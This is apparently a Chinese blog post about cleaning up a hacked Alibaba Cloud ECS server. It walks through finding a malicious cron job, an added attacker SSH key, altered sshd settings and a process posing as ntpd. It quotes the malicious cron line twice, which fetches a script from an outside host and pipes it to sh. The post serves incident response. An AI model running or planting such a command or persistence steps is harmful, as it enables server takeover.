阿里云ＥＣＳ被黑后的处理－之－清除挂马

一天发现服务器很卡，还有一些服务莫名的挂掉了，ｓｓｈ不能通过ｋｅｙ登陆，需要密码。感觉有问题，进入系统，查看定时任务发现一个可以的plan。*/10 * * * * curl -fsSL https://r.chanstring.com/pm.sh?0706 | sh。于是浏览器输入该网址的到了一个脚本。而后开启了定点清除任务。

１．查看.ssh目录内容，检查一下自己的ｋｅｙ。如图多了几个文件。可以打开看看。

    

    

查看一下计划任务。

*/10 * * * * curl -fsSL https://r.chanstring.com/pm.sh?0706 | sh

２．打开ｃｒｏｎｔａｂ　发现一个uri，用浏览器打开看看，是一个脚本，下载下来看看先。

    

３．有了这个脚本就容易多了，先看看黑客都干了什么，然后照着还原回去就行了。看图

    可以看到，他把自己的ｋｅｙ加进来，并在ｓｓｈ的配置文件里修改指向了自己ｋｅｙ文件，

    并允许ｒｏｏｔ用户登陆，安装了一个不知道的什么东东，并冒充ｎｔｐｄ启动了。

    

４．如图，该删的删，

    

５．查看进程，发现了一个冒充时间服务器的ｎｔｐ进程，，停掉，顺便也把启动脚本也干掉。

    

    

    

就是一个启动脚本居然还有日志，做的跟真的是的？？？？？？，有兴趣可以打开看看。

先停掉再说

６．主进程也得干掉，这是最重要的，干掉后服务器瞬间恢复了，反应和以前一样块了，

    

７．最后防火墙一定要开啊。

    

有什么漏掉的欢迎大家留言指教。